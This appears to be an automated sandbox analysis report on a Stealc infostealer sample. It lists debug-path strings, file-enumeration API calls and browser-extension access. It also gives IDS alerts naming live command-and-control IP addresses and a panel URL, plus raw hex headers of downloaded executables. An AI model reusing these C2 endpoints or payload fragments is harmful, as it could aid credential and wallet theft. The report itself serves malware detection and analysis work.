                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2675924617.00000256731F0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006E8E000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515162487.00000256581F0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006B80000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1389721607.000000006C947000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000014.00000002.1484091250.000000006C947000.00000002.00000001.01000000.00000013.sdmp
                            Source: Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
                            Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516504389.00000256583D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0041D9E1 FindFirstFileExA,0_2_0041D9E1
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0433DC48 FindFirstFileExA,0_2_0433DC48
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,10_2_00412570
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,10_2_0040D1C0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,10_2_004015C0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,10_2_00411650
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,10_2_0040B610
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,10_2_0040DB60
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,10_2_00411B80
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,10_2_0040D540
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,10_2_004121F0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C84261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,18_2_6C84261E
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                            Networking

                            barindex
                            Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.7:49699 -> 185.172.128.90:80
                            Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.7:49703 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.7:49703 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.7:49703
                            Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.7:49703 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.7:49703
                            Source: Malware configuration extractorURLs: 185.172.128.76/3cd2b41cbde8fc9c.php
                            Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                            Source: global trafficTCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: global trafficTCP traffic: 192.168.2.7:49736 -> 91.215.85.66:15647
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:43:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 23 Apr 2024 07:30:02 GMTETag: "52200-616be85ac7fe9"Accept-Ranges: bytesContent-Length: 336384Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 05 86 02 15 41 e7 6c 46 41 e7 6c 46 41 e7 6c 46 4c b5 b3 46 59 e7 6c 46 4c b5 8c 46 39 e7 6c 46 4c b5 8d 46 6d e7 6c 46 48 9f ff 46 46 e7 6c 46 41 e7 6d 46 2f e7 6c 46 f4 79 89 46 40 e7 6c 46 4c b5 b7 46 40 e7 6c 46 f4 79 b2 46 40 e7 6c 46 52 69 63 68 41 e7 6c 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 82 38 12 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 de 00 00 00 66 c3 03 00 00 00 00 45 39 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 c4 03 00 04 00 00 b8 67 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 51 01 00 50 00 00 00 00 30 c2 03 d0 1d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 47 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e3 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 6b 00 00 00 f0 00 00 00 6c 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 c6 c0 03 00 60 01 00 00 b6 01 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 1d 02 00 00 30 c2 03 00 1e 02 00 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Apr 2024 07:28:17 GMTContent-Type: application/octet-streamContent-Length: 8538160Last-Modified: Mon, 22 Apr 2024 21:57:43 GMTConnection: keep-aliveETag: "6626dd57-824830"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 41 fc f8 63 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 cc 0d 00 00 28 74 00 00 00 00 00 e8 e4 0d 00 00 10 00 00 00 f0 0d 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 82 00 00 04 00 00 29 e5 82 00 02 00 40 01 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 28 34 00 00 00 30 10 00 a4 8a 72 00 00 00 00 00 00 00 00 00 00 f8 81 00 30 50 00 00 00 f0 0e 00 78 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 89 0e 00 10 08 00 00 00 c0 0e 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 b2 0d 00 00 10 00 00 00 b4 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 54 16 00 00 00 d0 0d 00 00 18 00 00 00 b8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 27 00 00 00 f0 0d 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 20 53 00 00 00 20 0e 00 00 00 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 34 00 00 00 80 0e 00 00 36 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 f6 03 00 00 00 c0 0e 00 00 04 00 00 00 2e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 3c 00 00 00 00 d0 0e 00 00 00 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 0e 00 00 02 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 36 01 00 00 f0 0e 00 00 38 01 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 a4 8a 72 00 00 30 10 00 00 8c 72 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00
